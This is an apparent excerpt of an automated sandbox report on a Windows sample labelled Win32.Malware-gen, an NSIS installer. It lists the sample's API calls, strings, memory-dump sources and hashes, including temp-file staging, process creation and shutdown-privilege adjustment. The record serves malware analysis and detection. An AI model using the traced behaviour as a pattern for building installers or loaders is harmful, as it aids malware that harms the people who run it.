                                                                                                                        • SetErrorMode.KERNELBASE ref: 0040351F
                                                                                                                        • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040354A
                                                                                                                        • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 0040355D
                                                                                                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 004035F6
                                                                                                                        • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403633
                                                                                                                        • OleInitialize.OLE32(00000000), ref: 0040363A
                                                                                                                        • SHGetFileInfoW.SHELL32(00420EC8,00000000,?,000002B4,00000000), ref: 00403659
                                                                                                                        • GetCommandLineW.KERNEL32(00428A20,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040366E
                                                                                                                        • CharNextW.USER32(00000000,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe",00000020,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe",00000000,?,00000008,0000000A,0000000C), ref: 004036A7
                                                                                                                        • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037DF
                                                                                                                        • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037F0
                                                                                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037FC
                                                                                                                        • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403810
                                                                                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403818
                                                                                                                        • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403829
                                                                                                                        • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403831
                                                                                                                        • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403845
                                                                                                                        • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040391E
                                                                                                                          • Part of subcall function 00406521: lstrcpynW.KERNEL32(?,?,00000400,0040366E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040652E
                                                                                                                        • wsprintfW.USER32 ref: 0040397B
                                                                                                                        • GetFileAttributesW.KERNEL32(916,C:\Users\user\AppData\Local\Temp\), ref: 004039AE
                                                                                                                        • DeleteFileW.KERNEL32(916), ref: 004039BA
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004039E8
                                                                                                                          • Part of subcall function 004062E1: MoveFileExW.KERNEL32(?,?,00000005,00405DDF,?,00000000,000000F1,?,?,?,?,?), ref: 004062EB
                                                                                                                        • CopyFileW.KERNEL32(C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe,916,?,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004039FE
                                                                                                                          • Part of subcall function 00405B04: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,916,?), ref: 00405B2D
                                                                                                                          • Part of subcall function 00405B04: CloseHandle.KERNEL32(?,?,?,916,?), ref: 00405B3A
                                                                                                                          • Part of subcall function 0040687E: FindFirstFileW.KERNELBASE(?,00425F58,C:\Users\user\AppData\Local\Temp\nst8185.tmp,00405F41,C:\Users\user\AppData\Local\Temp\nst8185.tmp,C:\Users\user\AppData\Local\Temp\nst8185.tmp,00000000,C:\Users\user\AppData\Local\Temp\nst8185.tmp,C:\Users\user\AppData\Local\Temp\nst8185.tmp, 44v,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,76343420,C:\Users\user\AppData\Local\Temp\), ref: 00406889
                                                                                                                          • Part of subcall function 0040687E: FindClose.KERNEL32(00000000), ref: 00406895
                                                                                                                        • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A4C
                                                                                                                        • ExitProcess.KERNEL32 ref: 00403A69
                                                                                                                        • CloseHandle.KERNEL32(00000000,0042D000,0042D000,?,916,00000000), ref: 00403A70
                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A8C
                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403A93
                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA8
                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403ACB
                                                                                                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AF0
                                                                                                                        • ExitProcess.KERNEL32 ref: 00403B13
                                                                                                                          • Part of subcall function 00405ACF: CreateDirectoryW.KERNELBASE(?,00000000,004034EF,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405AD5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                                                                                        • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe"$1033$916$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe$C:\Users\user\polaritets$C:\Users\user\polaritets$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                                                                                        • API String ID: 1813718867-3441369084
                                                                                                                        • Opcode ID: 861c3a791dac713e5dc6c418a8dec487fa289242a5d5f99aa186722fda572ff2
                                                                                                                        • Instruction ID: bee44f309595f2ff458e9cecae568de25c9667724a66d0f49069eb89ae1a0629
                                                                                                                        • Opcode Fuzzy Hash: 861c3a791dac713e5dc6c418a8dec487fa289242a5d5f99aa186722fda572ff2
                                                                                                                        • Instruction Fuzzy Hash: FDF10170204301ABD720AF659D05B2B3EE8EB8570AF11483EF581B62D1DB7DCA45CB6E

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        APIs
                                                                                                                        • GetDlgItem.USER32(?,00000403), ref: 00405743
                                                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 00405752
                                                                                                                        • GetClientRect.USER32(?,?), ref: 0040578F
                                                                                                                        • GetSystemMetrics.USER32(00000002), ref: 00405796
                                                                                                                        • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B7
                                                                                                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C8
                                                                                                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057DB
                                                                                                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E9
                                                                                                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057FC
                                                                                                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040581E
                                                                                                                        • ShowWindow.USER32(?,00000008), ref: 00405832
                                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 00405853
                                                                                                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405863
                                                                                                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040587C
                                                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405888
                                                                                                                        • GetDlgItem.USER32(?,000003F8), ref: 00405761
                                                                                                                          • Part of subcall function 004044D5: SendMessageW.USER32(00000028,?,?,00404300), ref: 004044E3
                                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004058A5
                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_00005679,00000000), ref: 004058B3
                                                                                                                        • CloseHandle.KERNELBASE(00000000), ref: 004058BA
                                                                                                                        • ShowWindow.USER32(00000000), ref: 004058DE
                                                                                                                        • ShowWindow.USER32(?,00000008), ref: 004058E3
                                                                                                                        • ShowWindow.USER32(00000008), ref: 0040592D
                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405961
                                                                                                                        • CreatePopupMenu.USER32 ref: 00405972
                                                                                                                        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405986
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 004059A6
                                                                                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059BF
                                                                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F7
                                                                                                                        • OpenClipboard.USER32(00000000), ref: 00405A07
                                                                                                                        • EmptyClipboard.USER32 ref: 00405A0D
                                                                                                                        • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A19
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00405A23
                                                                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A37
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405A57
                                                                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00405A62
                                                                                                                        • CloseClipboard.USER32 ref: 00405A68
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                        • String ID: {
                                                                                                                        • API String ID: 590372296-366298937
                                                                                                                        • Opcode ID: bcd6524ca319c6da9779c5e50c73cceb5f6d9afdf0ecbcca2ead9855fe138ddf
                                                                                                                        • Instruction ID: bfdbfabbc3eccdd340dcac883e36f8678c6b127a6a9b52dc92d7db9eae4071ee
                                                                                                                        • Opcode Fuzzy Hash: bcd6524ca319c6da9779c5e50c73cceb5f6d9afdf0ecbcca2ead9855fe138ddf
                                                                                                                        • Instruction Fuzzy Hash: FBB127B1900618FFDB11AF60DD89AAE7B79FB44354F00813AFA41B61A0CB754A92DF58

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        APIs
                                                                                                                        • DeleteFileW.KERNELBASE(?,?,76343420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe"), ref: 00405C56
                                                                                                                        • lstrcatW.KERNEL32(00424F10,\*.*,00424F10,?,?,76343420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe"), ref: 00405C9E
                                                                                                                        • lstrcatW.KERNEL32(?,0040A014,?,00424F10,?,?,76343420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe"), ref: 00405CC1
                                                                                                                        • lstrlenW.KERNEL32(?,?,0040A014,?,00424F10,?,?,76343420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe"), ref: 00405CC7
                                                                                                                        • FindFirstFileW.KERNEL32(00424F10,?,?,?,0040A014,?,00424F10,?,?,76343420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe"), ref: 00405CD7
                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D77
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00405D86
                                                                                                                        Strings
                                                                                                                        • \*.*, xrefs: 00405C98
                                                                                                                        • "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe", xrefs: 00405C36
                                                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C3A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                        • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                        • API String ID: 2035342205-1373261282

                                                                                                                        Control-flow Graph (legend: Executed, Not Executed)
                                                                                                                        APIs
                                                                                                                        • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\polaritets,?,?,00000031), ref: 004017B5
                                                                                                                        • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\polaritets,?,?,00000031), ref: 004017DA
                                                                                                                          • Part of subcall function 00406521: lstrcpynW.KERNEL32(?,?,00000400,0040366E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040652E
                                                                                                                          • Part of subcall function 004055A6: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000,?), ref: 004055DE
                                                                                                                          • Part of subcall function 004055A6: lstrlenW.KERNEL32(004033F2,Skipped: C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000), ref: 004055EE
                                                                                                                          • Part of subcall function 004055A6: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll,004033F2,004033F2,Skipped: C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll,00000000,00418EC0,00000000), ref: 00405601
                                                                                                                          • Part of subcall function 004055A6: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll), ref: 00405613
                                                                                                                          • Part of subcall function 004055A6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405639
                                                                                                                          • Part of subcall function 004055A6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405653
                                                                                                                          • Part of subcall function 004055A6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405661
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\nst8185.tmp$C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll$C:\Users\user\polaritets$Call
                                                                                                                        • API String ID: 1941528284-2501724552
                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNELBASE(?,00425F58,C:\Users\user\AppData\Local\Temp\nst8185.tmp,00405F41,C:\Users\user\AppData\Local\Temp\nst8185.tmp,C:\Users\user\AppData\Local\Temp\nst8185.tmp,00000000,C:\Users\user\AppData\Local\Temp\nst8185.tmp,C:\Users\user\AppData\Local\Temp\nst8185.tmp, 44v,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,76343420,C:\Users\user\AppData\Local\Temp\), ref: 00406889
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00406895
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\AppData\Local\Temp\nst8185.tmp, xrefs: 0040687E
                                                                                                                        • X_B, xrefs: 0040687F
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\nst8185.tmp$X_B
                                                                                                                        • API String ID: 2295610775-1899747280

                                                                                                                        Control-flow Graph (legend: Executed, Not Executed)
                                                                                                                        APIs
                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FDD
                                                                                                                        • ShowWindow.USER32(?), ref: 00403FFD
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0040400F
                                                                                                                        • ShowWindow.USER32(?,00000004), ref: 00404028
                                                                                                                        • DestroyWindow.USER32 ref: 0040403C
                                                                                                                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404055
                                                                                                                        • GetDlgItem.USER32(?,?), ref: 00404074
                                                                                                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404088
                                                                                                                        • IsWindowEnabled.USER32(00000000), ref: 0040408F
                                                                                                                        • GetDlgItem.USER32(?,?), ref: 0040413A
                                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 00404144
                                                                                                                        • SetClassLongW.USER32(?,000000F2,?), ref: 0040415E
                                                                                                                        • SendMessageW.USER32(0000040F,00000000,?,?), ref: 004041AF
                                                                                                                        • GetDlgItem.USER32(?,00000003), ref: 00404255
                                                                                                                        • ShowWindow.USER32(00000000,?), ref: 00404276
                                                                                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404288
                                                                                                                        • EnableWindow.USER32(?,?), ref: 004042A3
                                                                                                                        • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 004042B9
                                                                                                                        • EnableMenuItem.USER32(00000000), ref: 004042C0
                                                                                                                        • SendMessageW.USER32(?,000000F4,00000000,?), ref: 004042D8
                                                                                                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042EB
                                                                                                                        • lstrlenW.KERNEL32(00422F08,?,00422F08,00000000), ref: 00404315
                                                                                                                        • SetWindowTextW.USER32(?,00422F08), ref: 00404329
                                                                                                                        • ShowWindow.USER32(?,0000000A), ref: 0040445D
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00406915: GetModuleHandleA.KERNEL32(?,00000020,?,0040360C,0000000C,?,?,?,?,?,?,?,?), ref: 00406927
                                                                                                                          • Part of subcall function 00406915: GetProcAddress.KERNEL32(00000000,?), ref: 00406942
                                                                                                                        • lstrcatW.KERNEL32(1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,76343420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe",00008001), ref: 00403C74
                                                                                                                        • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\polaritets,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,76343420), ref: 00403CF4
                                                                                                                        • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\polaritets,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000), ref: 00403D07
                                                                                                                        • GetFileAttributesW.KERNEL32(Call), ref: 00403D12
                                                                                                                        • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\polaritets), ref: 00403D5B
                                                                                                                          • Part of subcall function 00406468: wsprintfW.USER32 ref: 00406475
                                                                                                                        • RegisterClassW.USER32(004289C0), ref: 00403D98
                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DB0
                                                                                                                        • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DE5
                                                                                                                        • ShowWindow.USER32(00000005,00000000), ref: 00403E1B
                                                                                                                        • GetClassInfoW.USER32(00000000,RichEdit20W,004289C0), ref: 00403E47
                                                                                                                        • GetClassInfoW.USER32(00000000,RichEdit,004289C0), ref: 00403E54
                                                                                                                        • RegisterClassW.USER32(004289C0), ref: 00403E5D
                                                                                                                        • DialogBoxParamW.USER32(?,00000000,00403FA1,00000000), ref: 00403E7C
                                                                                                                        Similarity
                                                                                                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                        • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\polaritets$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb

                                                                                                                        APIs
                                                                                                                        • GetTickCount.KERNEL32 ref: 00403093
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe,00000400), ref: 004030AF
                                                                                                                          • Part of subcall function 00406011: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe,80000000,00000003), ref: 00406015
                                                                                                                          • Part of subcall function 00406011: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00406037
                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe,C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe,80000000,00000003), ref: 004030FB
                                                                                                                        • GlobalAlloc.KERNELBASE(00000040,?), ref: 00403231
                                                                                                                        Strings
                                                                                                                        • Error launching installer, xrefs: 004030D2
                                                                                                                        • soft, xrefs: 00403170
                                                                                                                        • Inst, xrefs: 00403167
                                                                                                                        • C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, xrefs: 00403099, 004030A8, 004030BC, 004030DC
                                                                                                                        • Null, xrefs: 00403179
                                                                                                                        • "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe", xrefs: 00403088
                                                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403089
                                                                                                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403258
                                                                                                                        • C:\Users\user\Desktop, xrefs: 004030DD, 004030E2, 004030E8
                                                                                                                        Similarity
                                                                                                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                        • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft

                                                                                                                        APIs
                                                                                                                        • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406680
                                                                                                                        • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll,?,?,00000000,00000000,00418EC0,00000000), ref: 00406696
                                                                                                                        • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 004066F4
                                                                                                                        • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 004066FD
                                                                                                                        • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll,?,?,00000000,00000000,00418EC0,00000000), ref: 00406728
                                                                                                                        • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll,?,?,00000000,00000000,00418EC0,00000000), ref: 00406782
                                                                                                                        Similarity
                                                                                                                        • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                                                                                        • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch

                                                                                                                        APIs
                                                                                                                        • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000,?), ref: 004055DE
                                                                                                                        • lstrlenW.KERNEL32(004033F2,Skipped: C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000), ref: 004055EE
                                                                                                                        • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll,004033F2,004033F2,Skipped: C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll,00000000,00418EC0,00000000), ref: 00405601
                                                                                                                        • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll), ref: 00405613
                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405639
                                                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405653
                                                                                                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405661
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
